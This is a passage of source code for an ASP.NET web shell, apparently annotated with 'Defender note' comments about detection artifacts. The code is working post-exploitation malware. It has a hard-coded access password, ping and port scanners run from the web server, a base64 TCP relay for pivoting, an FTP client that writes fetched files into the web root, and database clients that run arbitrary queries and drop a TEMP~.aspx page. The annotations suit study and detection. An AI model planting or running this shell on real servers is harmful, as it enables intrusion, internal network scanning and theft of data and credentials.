  1. <%@ Page Language="C#" EnableViewState="false" %>
  2. <%@ Import Namespace="System.Net.NetworkInformation" %>
  3. <%@ Import Namespace="System.Web.UI.WebControls" %>
  4. <%@ Import Namespace="System.Data.SqlClient" %>
  5. <%@ Import Namespace="System.Net.Sockets" %>
  6. <%@ Import Namespace="System.Diagnostics" %>
  7. <%@ Import Namespace="System.Net" %>
  8. <%@ Import Namespace="System.IO" %>
  9.  
  10.  
  11. <%
  12.  
  13. // Password Shell //////////////////////////////////////////////////////////////////////////////////////
  // NOTE(review): hard-coded access gate for the shell; the comparison that consumes it is not in this
  // chunk. Defender use: a fixed literal like this, sitting in an inline-code page under the web root,
  // is a cheap static indicator for hunting copies of the same tool on other hosts.
  14. String PASSWORG_SHELL = "lulz4u";
  15. ////////////////////////////////////////////////////////////////////////////////////////////////////////
  16.  
  17. // Variables
  18. string MARIA = Path.GetFileName(Request.Path);
  19. string MainDrive = Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
  20. string Output = "";String Folders = "";
  21. String Files = ""; String Binaries = ""; String PORTSCAN = "";
  22. String ResultSearchOuput = "<h1>Result Found</h1>"; String OutputFTPBuffer = ""; String querys = "";
  23. String OutputFTPStatus="";String DirFTP="";String attributesOfFiles="";String SQLView="";String PINGSCAN="";
  24.  
  25. // List Storages
  26. string CurrentFolder = Page.MapPath(".") + "/";
  27. if (!string.IsNullOrEmpty(Request.QueryString["Directory"]))
  28. CurrentFolder = Request.QueryString["Directory"] + "/";
  29. CurrentFolder = CurrentFolder.Replace("\\", "/");
  30. CurrentFolder = CurrentFolder.Replace("//", "/");
  31. foreach(DriveInfo curdrive in DriveInfo.GetDrives())
  32. {
  33. if (!curdrive.IsReady)
  34. continue;
  35. string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
  36. Output += string.Format("<a href='?Directory={0}' title='{2} Bytes Free'><input type='button' value='{1}'></a>&nbsp;", HttpUtility.UrlEncode(driveRoot), HttpUtility.HtmlEncode(driveRoot), curdrive.TotalFreeSpace);
  37. }
  38.  
  39. // PING Scan
  // Defender note: when the POST body carries "Range", this sweeps one /24 with synchronous ICMP echo
  // requests issued by the web server's own worker process (one HTTP request triggers up to 255 pings,
  // each waiting up to the caller-supplied "Timeout"). That is the observable: a web application worker
  // originating ICMP sweeps is not normal behaviour and is a solid host/network detection signal.
  40. if(!string.IsNullOrEmpty(Request.Form["Range"])){
  41. Ping pinger = new Ping();
  // "Timeout" is taken from the form as-is and converted with Convert.ToInt32.
  42. int TIMEOUT = Convert.ToInt32(Request.Form["Timeout"]);
  43. PINGSCAN += "<table class='tabla'> <tr> <th scope='col'>IP</th> <th scope='col'>Status</th> </tr>";
  44.  
  // Only the first three dotted octets of "Range" are used; the last octet is the loop index.
  45. string[] IPRange = Request.Form["Range"].Split('.');
  46. for(int index=0;index != 255;index++){
  47. try {
  48. PingReply reply = pinger.Send(IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index,TIMEOUT);
  49. bool pingable = false;
  50. pingable = reply.Status == IPStatus.Success;
  51. if (pingable == true)
  52. {
  53. PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td><font color='green'>LIVE</font></td></tr>";
  54. }else{
  55. PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
  56. }
  57. }
  // A PingException is reported the same way as an unanswered echo.
  58. catch (PingException)
  59. {
  60. PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
  61. }
  62. }
  63. PINGSCAN += "</table><script>DivShowAndHidden('PSCAN');</script>";
  64. }
  65.  
  66. // PORT Scan
  // Defender note: with "IPSCAN" posted, a single TcpClient attempts a synchronous Connect to every entry
  // of the comma-separated "Ports" field. Each attempt is an ordinary outbound TCP connection from the web
  // server process, so it lands in firewall / flow / EDR network telemetry as the worker process reaching
  // many ports on one host in quick succession. Any exception is swallowed and rendered as DOWN, so the
  // page output itself carries no error detail.
  67. if(!string.IsNullOrEmpty(Request.Form["IPSCAN"])){
  68. string[] port = Request.Form["Ports"].Split(',');
  69. PORTSCAN += "<table class='tabla'> <tr> <th scope='col'>Port</th> <th scope='col'>Status</th> </tr>";
  70. TcpClient socket = new TcpClient();
  71. IPAddress address = IPAddress.Parse(Request.Form["IPSCAN"]);
  // Send/receive timeouts are set to 3000 ms on the client; they are not what bounds Connect itself.
  72. socket.SendTimeout = 3000;
  73. socket.ReceiveTimeout = 3000;
  74. for(int indexb=0;indexb != port.Length;indexb++){
  75. try{
  76. socket.Connect(address, Convert.ToInt32(port[indexb]));
  77. if(socket.Connected){
  78. PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td><font color='green'>LIVE</font></td></tr>";
  79. }else{
  80. PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
  81. }
  82. }catch(Exception e){
  83. PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
  84. }
  85. }
  86. PORTSCAN += "<script>DivShowAndHidden('PORTSCAN');</script>";
  87. }
  88.  
  89. // PROXY
  // Defender note: a raw TCP relay. "Host" and "Port" come from the query string, the payload is the
  // base64-encoded "REQUEST" query parameter, and whatever the remote end sends back is written to the
  // response verbatim before Response.End(). Because all three values travel in the query string, the
  // relayed target and the complete encoded payload are preserved in the web server's access log — a
  // reliable pivot when reconstructing what was tunnelled through this host. The socket is never
  // closed or disposed in this block.
  90. if(!string.IsNullOrEmpty(Request.QueryString["REQUEST"])){
  91.  
  92. TcpClient socket = new TcpClient();
  93. IPAddress address = IPAddress.Parse(Request.QueryString["Host"]);
  94. socket.SendTimeout = 10000;
  95. socket.ReceiveTimeout = 10000;
  96.  
  97. socket.Connect(address, Convert.ToInt32(Request.QueryString["Port"]));
  98.  
  99. if(socket.Connected){
  100.  
  101. NetworkStream networkStream;
  102. StreamWriter streamWriter;
  103. StreamReader streamReader;
  104.  
  105. networkStream = socket.GetStream();
  106. streamReader = new StreamReader(networkStream);
  107. streamWriter = new StreamWriter(networkStream);
  108.  
  // The decoded payload is written as UTF-8 text, not as raw bytes.
  109. byte[] data = Convert.FromBase64String(Request.QueryString["REQUEST"]);
  110. streamWriter.Write(Encoding.UTF8.GetString(data));
  111. streamWriter.Flush();
  112.  
  // Reads until the remote side stops sending, growing the buffer by doubling when it fills up.
  113. byte[] buffer = new byte[32768];
  114. int read = 0;
  115.  
  116. int chunk;
  117. while ((chunk = networkStream.Read(buffer, read, buffer.Length - read)) > 0) {
  118. read += chunk;
  119. if (read != buffer.Length) { continue; }
  120. int nextByte = networkStream.ReadByte();
  121. if (nextByte == -1) { break; }
  122.  
  123. byte[] newBuffer = new byte[buffer.Length * 2];
  124. Array.Copy(buffer, newBuffer, buffer.Length);
  125. newBuffer[read] = (byte)nextByte;
  126. buffer = newBuffer;
  127. read++;
  128. }
  129.  
  // The reply is returned as the whole HTTP response body; nothing else on the page is rendered.
  130. byte[] ret = new byte[read];
  131. Array.Copy(buffer, ret, read);
  132. Response.OutputStream.Write(ret, 0, ret.Length);
  133. Response.End();
  134. }
  135. }
  136.  
  137. // FTP Client
  138. if(!string.IsNullOrEmpty(Request.Form["FTP"])){
  139. try{
  140. // List Files in FTP Server
  141. DirFTP=Request.Form["command"];
  142. if(!string.IsNullOrEmpty(Request.Form["FolderCurrent"]) & !string.IsNullOrEmpty(DirFTP)){
  143. DirFTP=Request.Form["FolderCurrent"]+"/"+DirFTP;}
  144.  
  145. if(Request.Files["filetoFTP"]==null | Request.Form["action"]=="cd"){
  146. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  147. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  148. request.Method = WebRequestMethods.Ftp.ListDirectoryDetails;
  149. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  150. Stream responseStream = response.GetResponseStream();
  151. StreamReader reader = new StreamReader(responseStream);
  152. OutputFTPBuffer="<table class='tabla'><tr><th scope='col'>Output</th></tr>";
  153. while (!reader.EndOfStream) {OutputFTPBuffer+="<tr><td>"+reader.ReadLine()+"</td></tr>";}
  154. OutputFTPStatus="</table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST' enctype='multipart/form-data' ><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='download'>Download</option><option value='DeleteFileFTP'>Delete File</option><option value='DeleteFileFolder'>Delete Folder</option><option value='cd'>Change Directory</option><option value='newDir'>New Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='file' name='filetoFTP'> <input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+"</i></b></form>";
  155. reader.Close();
  156. response.Close();}
  157.  
  158. // Download File to FTP Server
  // Defender note: the "download" action fetches the file named by "command" from the posted FTP host
  // and writes it to CurrentFolder + Request.Form["command"], i.e. into the directory the shell is
  // currently browsing (a web-served path unless ?Directory= pointed elsewhere). A file created there,
  // with a caller-chosen name, is the on-disk artifact to look for. The FTP host/user/pass are echoed
  // back as hidden form fields, so they are present in captured traffic and in POST bodies if logged.
  159. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="download"){
  160. int bytesRead = 0;
  161. byte[] buffer = new byte[2048];
  162. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  163. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  164. request.Method = WebRequestMethods.Ftp.DownloadFile;
  165. Stream reader = request.GetResponse().GetResponseStream();
  // FileMode.Create overwrites an existing file of the same name without warning.
  166. FileStream fileStream = new FileStream(@CurrentFolder+Request.Form["command"], FileMode.Create);
  167. while (true){bytesRead = reader.Read(buffer, 0, buffer.Length);if (bytesRead == 0){break;}fileStream.Write(buffer, 0, bytesRead);}fileStream.Close();
  168. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status, Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
  169.  
  170. // Make Folder to FTP Server
  171. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="newDir"){
  172. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  173. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  174. request.Method = WebRequestMethods.Ftp.MakeDirectory;
  175. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  176. Stream responseStream = response.GetResponseStream();
  177. StreamReader reader = new StreamReader(responseStream);
  178. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
  179.  
  180. // Upload File to FTP Server
  181. if(Request.Files["filetoFTP"]!=null){}
  182.  
  183. // Delete File of FTP Server
  184. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFTP"){
  185. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  186. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  187. request.Method = WebRequestMethods.Ftp.DeleteFile;
  188. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  189. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
  190. response.Close();}
  191.  
  192. // Delete Folders of FTP Server
  193. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFolder"){
  194. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  195. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  196. request.Method = WebRequestMethods.Ftp.RemoveDirectory;
  197. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  198. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
  199. response.Close();}
  200.  
  201. }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
  202. }
  203.  
  204.  
  205. // SQL Clients
  206. if(!string.IsNullOrEmpty(Request.Form["SQLProtocol"]) | !string.IsNullOrEmpty(Request.QueryString["SQLProtocol"])) {
  207. // For each MySQL Services
  208. String LOCALHOST= Request.Form["host"] + Request.QueryString["host"];
  209. String PORT = Request.Form["port"] + Request.QueryString["port"];
  210. String USERNAME = Request.Form["user"] + Request.QueryString["user"];
  211. String PASSWORD = Request.Form["pass"] + Request.QueryString["pass"];
  212. String DATABASE = Request.Form["database"] + Request.QueryString["database"];
  213. String FILE = Request.Form["filename"] + Request.QueryString["filename"];
  214.  
  215. // Ms-Mysql Server
  216. if (Request.Form["SQLProtocol"] == "SQLServer" | Request.QueryString["SQLProtocol"] == "SQLServer")
  217. {
  218. try
  219. {
  220. String TypeOutput = "";
  221. System.Data.SqlClient.SqlConnection conn;
  222. string myConnectionString;
  223. myConnectionString = "Data Source=" + LOCALHOST + ";uid=" + USERNAME + ";" + "pwd=" + PASSWORD + ";Network Library=DBMSSOCN;Initial Catalog=" + DATABASE + ";";
  224. conn = new System.Data.SqlClient.SqlConnection();
  225. conn.ConnectionString = myConnectionString;
  226. conn.Open();
  227.  
  228. String Action = Request.QueryString["Action"];
  229. Action += Request.Form["Action"];
  230. if (Action == "SelectTable")
  231. {
  232. querys = "SELECT * FROM " + Request.QueryString["Value"] + "";
  233. TypeOutput = "columns";
  234. }
  235. else if (Action == "ListTables")
  236. {
  237. querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'";
  238. TypeOutput = "Tables";
  239. }
  240. else if (!string.IsNullOrEmpty(Request.Form["queryString"]))
  241. {
  242. querys = Request.Form["queryString"];
  243. TypeOutput = "Query";
  244. }
  245. else
  246. {
  247. querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'";
  248. TypeOutput = "Tables";
  249. }
  250. System.Data.SqlClient.SqlCommand mycomand = new System.Data.SqlClient.SqlCommand(querys, conn);
  251. System.Data.SqlClient.SqlDataReader myreader = mycomand.ExecuteReader();
  252. if (TypeOutput != "Query")
  253. {
  254. int CounterColumn = myreader.FieldCount;
  255. SQLView += "<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>";
  256. for (int i = 0; i < CounterColumn; i++)
  257. {
  258. SQLView += "<th scope='col'>" + myreader.GetName(i) + "</th>";
  259. }
  260. while (myreader.Read())
  261. {
  262. String Field = "";
  263. int dbFields = myreader.FieldCount;
  264. for (int i = 1; i < dbFields; i++)
  265. {
  266. Field += "<td>" + myreader[i] + "</td>";
  267. }
  268. if (TypeOutput == "Tables")
  269. {
  270. SQLView += "<tr><td><a href='?SQLProtocol=SQLServer&Action=SelectTable&host="+LOCALHOST+"&user="+USERNAME+"&pass="+PASSWORD+"&database="+DATABASE+"&Value=" + myreader[2] + "' title='Table'>" + myreader[2] + "</td>" + Field + "</tr>";
  271. }
  272. else
  273. {
  274. SQLView += "<tr><td>" + myreader[0] + "</td>" + Field + "</tr>";
  275. }
  276. Field = "";
  277. }
  278. }
  279. else
  280. {
  281. SQLView += "<div class='footTable'><b><h2>Output</h2></b>";
  282. while (myreader.Read())
  283. {
  284. SQLView += myreader[0].ToString();
  285. }
  286. SQLView += "</code></div>";
  287. }
  288. SQLView += "</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action=" + MARIA + "><input type=hidden name=SQLProtocol value=SQLServer><input type=hidden name=host value=" + LOCALHOST + "><input type=hidden name=database value=" + DATABASE + "><input type=hidden name=user value=" + USERNAME + "><input type=hidden name=pass value=" + PASSWORD + "><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>";
  289. }
  290. catch (Exception e)
  291. {
  292. Response.Write("<div class='alert'>"+e.Message+"</div>");
  293. }
  294. }
  295. // Mysql Client
  296. if (Request.Form["SQLProtocol"] == "MySQL" | Request.QueryString["SQLProtocol"] == "MySQL")
  297. {
  298. try
  299. {
  300. String FileCreateMYSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
  301. String FileCreateMYSQLb = @"<%";
  302. String FileCreateMYSQLc = @"String query="""";string MARIA = System.IO.Path.GetFileName(Request.Path);String SQLView="""";MySql.Data.MySqlClient.MySqlConnection conn; string myConnectionString; String LOCALHOST=Request.QueryString[""host""]+Request.Form[""host""]; String USERNAME=Request.QueryString[""user""]+Request.Form[""user""]; String PASSWORD=Request.QueryString[""pass""]+Request.Form[""pass""]; String DATABASE = Request.QueryString[""database""]+Request.Form[""database""]; myConnectionString = ""server=""+LOCALHOST+"";uid=""+USERNAME+"";"" + ""pwd=""+PASSWORD+"";database=""+DATABASE+"";""; try {conn = new MySql.Data.MySqlClient.MySqlConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String TypeOutput = """"; String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {query = ""SELECT * FROM `"" + Request.QueryString[""Value""] + ""`""; } else if (Action == ""ListTables"") {query = ""SHOW FULL TABLES FROM ""+Request.Form[""database""]; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {query = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {query = ""SHOW FULL TABLES FROM ""+DATABASE; TypeOutput = ""Tables""; } MySql.Data.MySqlClient.MySqlCommand mycomand = new MySql.Data.MySqlClient.MySqlCommand(query, conn); MySql.Data.MySqlClient.MySqlDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = "" ""; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a 
href='?SQLProtocol=Mysql&Action=SelectTable&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > MYsql Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=Mysql><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; } catch (Exception e) {Response.Write(""</table><div class='alert'>SHELL.ASPX Message: "" + e.Message + ""</div>"");}Response.Write(SQLView);";
  303. String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
  // Defender note: the MySQL branch does not query in-process. It drops a second inline-code page,
  // TEMP~.aspx, next to the shell (CurrentFolder) and then loads that page in an iframe with the DB
  // host, user, password and database in the query string. Two artifacts follow: TEMP~.aspx on disk
  // in the web root (nothing in this chunk deletes it), and the DB credentials in the web server access
  // log for the iframe GET. The SQLite and PostgreSQL branches below reuse the same temp-file pattern.
  304. using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
  305. System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateMYSQLa + FileCreateMYSQLb + FileCreateMYSQLc + "%" + ">" + StyleHTML);
  306. SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
  307.  
  308. }
  309. catch (Exception e)
  310. {
  311. Response.Write("<div class='alert'>" + e.Message + "</div>");
  312. }
  313. }
  314. // SQLite Client
  315. if (Request.Form["SQLProtocol"] == "SQLite" | Request.QueryString["Postgresql"] == "SQLite")
  316. {
  317. try
  318. {
  319. String FileCreateSQLitea = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
  320. String FileCreateSQLiteb = @"<%";
  321. String FileCreateSQLitec = @"try{String SQLView = """"; String TypeOutput = """"; String querys = """"; string myConnectionString; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string FILE = Request.Form[""filename""] + Request.QueryString[""filename""]; myConnectionString = ""Data Source=""+FILE; System.Data.SQLite.SQLiteConnection conn; conn = new System.Data.SQLite.SQLiteConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } System.Data.SQLite.SQLiteCommand mycomand = new System.Data.SQLite.SQLiteCommand(querys, conn); System.Data.SQLite.SQLiteDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th 
scope='col'>"" + myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = """"; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=SQLite&Action=SelectTable&filename=""+FILE+""&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > SQLite Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=SQLite><input type=hidden name=filename value="" + FILE + ""><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>""+e.Message+""</div>""); }";
  322. String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
  323. using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
  324. System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateSQLitea + FileCreateSQLiteb + FileCreateSQLitec + "%" + ">" + StyleHTML);
  325. SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?filename="+FILE+"&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
  326. }
  327. catch (Exception e)
  328. {
  329. Response.Write("<div class='alert'>" + e.Message + "</div>");
  330. }
  331. }
  332. // PostgreSQL Client
  333. if (Request.Form["SQLProtocol"] == "PostgreSQL" | Request.QueryString["Postgresql"] == "PostgreSQL")
  334. {
  335. try
  336. {
  337. String FileCreatePostgresSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
  338. String FileCreatePostgresSQLb = @"<%@ Import Namespace=""System"" " + "%" + ">";
  339. String FileCreatePostgresSQLc = @"<%@ Import Namespace=""System.Text"" " + "%" + ">";
  340. String FileCreatePostgresSQLd = @"<%@ Import Namespace=""Npgsql"" " + "%" + ">";
  341. String FileCreatePostgresSQLe = @"<%@ Import Namespace=""System.Data"" " + "%" + ">";
  342. String FileCreatePostgresSQLf = @"<%";
